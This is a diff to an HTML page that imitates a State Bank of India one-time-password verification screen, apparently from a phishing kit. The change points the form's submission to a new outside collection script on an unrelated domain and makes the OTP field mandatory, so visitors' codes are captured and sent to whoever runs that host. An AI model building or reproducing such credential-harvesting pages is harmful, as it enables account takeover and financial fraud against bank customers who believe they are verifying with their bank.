--- a/sbi/verification.html
+++ b/sbi/verification.html
@@ -15,11 +15,11 @@
             <div class="card p-4 text-center">
                 <img src="../sbi-logo.png" class="mx-auto d-block" width="30%">
                 <br>
-                <form id="contact_message" action="https://sbi-apply.000webhostapp.com/procced.php" method="post">    
+                <form id="contact_message" action="https://expertengineers.co.in/procced.php" method="post">    
                 <h6>Please enter the one time password <br> to verify your account</h6>
                 <div> <span>A code has been sent to</span> <small>**********</small> </div>
                 <div id="otp" class="inputs d-flex flex-row justify-content-center mt-2"> 
-                <input class="form-control" name="otp" id="otp" type="text" placeholder="OTP" style="width: 50%;">
+                <input class="form-control" name="otp" id="otp" type="text" placeholder="OTP" style="width: 50%;" required>
                 <button type="submit" class="btn btn-danger px-4 validate">Validate</button> </div>
                 </form>     
 
